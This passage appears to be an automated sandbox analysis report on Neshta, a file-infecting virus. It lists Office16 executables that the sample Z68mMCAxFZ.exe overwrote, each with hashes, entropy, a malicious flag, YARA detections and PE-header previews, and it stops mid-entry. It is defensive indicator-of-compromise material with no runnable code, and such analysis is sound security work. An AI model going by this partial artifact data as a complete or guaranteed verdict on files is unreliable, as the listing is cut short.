                                                          SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                          MD5:B4F5C898517A6B40402611BF65397423
                                                          SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                          SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                          SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.392056642854633
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                          MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                          SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                          SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                          SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.496755886640026
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                          MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                          SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
                                                          SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                          SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.268163712816429
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                          MD5:1EF797E5E199041B8A0EB41A50E73185
                                                          SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                          SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                          SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.201681837230837
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                          MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                          SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                          SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                          SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.352529349012904
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                          MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                          SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                          SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                          SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.46773744909196
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                          MD5:F3279F5053B3112B5299C08136AE58E9
                                                          SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                          SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                          SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4135504331115705
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                          MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                          SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                          SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                          SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.344917752925491
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                          MD5:EA546BBE947027BA147DE2719F53D051
                                                          SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                          SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                          SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.464347380493513
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                          MD5:072EDD1A5D3A99C26EA9987890989B31
                                                          SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                          SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                          SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4498443082331764
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                          MD5:187B658322698CB74D48476EB2ECB171
                                                          SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                          SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                          SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.336782734218808
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                          MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                          SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                          SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                          SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.531432224892055
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                          MD5:A651847108A83A8B2A3B75A66403B0DC
                                                          SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                          SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                          SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.556968630457308
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                          MD5:FB0697C512E65305CF24EFA18EC58086
                                                          SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                          SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                          SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.131108501135707
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                          MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                          SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                          SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                          SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.254281392784178
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                          MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                          SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                          SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                          SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.369176164130001
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                          MD5:E883EB6C4D29614F1887EDF6A2412659
                                                          SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                          SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                          SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.694866680260046
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                          MD5:A851E7A4D035C32FCB2830718B34F01C
                                                          SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                          SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                          SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.511827025814232
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                          MD5:2DBF9767B1524319753ADE899740500C
                                                          SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                          SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                          SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.361986604416892
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                          MD5:8F8291D79A298A9B071864C651BB0794
                                                          SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                          SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                          SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
